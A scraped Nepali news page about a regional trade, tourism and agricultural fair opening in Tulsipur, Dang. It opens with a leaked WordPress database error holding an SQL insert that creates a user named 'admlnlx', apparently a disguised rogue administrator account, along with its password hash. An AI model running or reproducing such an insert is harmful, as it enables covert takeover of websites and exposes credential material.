WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXrvcnky5johO.5mfUfqpTaAYkj8bW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:24:16', '', 'admlnlx', 'admlnlx')
दाङ माघ १३ –
दाङको तुलसीपुरमा बिहिबारबाट मध्यपश्चिम क्षेत्रिय व्यापारिक तथा पर्यटन महोत्सव एवम् औद्योगिक कृषि मेला सुरु भएको छ ।
सभागृह निर्माणसँगै पर्यटकीय ,सांस्कृतिक तथा धार्मिक क्षेत्रको संरक्षण गर्ने उद्देश्यले मेला आयोजना गरिएको तुलसीपुर उद्योग बाणीज्य संघका अध्यक्ष बिमल रिजालले जानकारी दिए ।५ लाख दर्शकहरुलाई अवलोकन गराउने लक्ष्य लिइएको महोत्वसव अवधिभर २० करोड आर्थिक कारोवार गर्ने र त्यसबाट एक करोड आर्थिक वचत गर्ने अपेक्षा रहेको आयोजकले जनाएको छ ।
महोत्सवको उद्घाटन हुनुपुर्व गाउँगाउँबाट झाँकीसहितको ¥याली निकालिएको थियो ।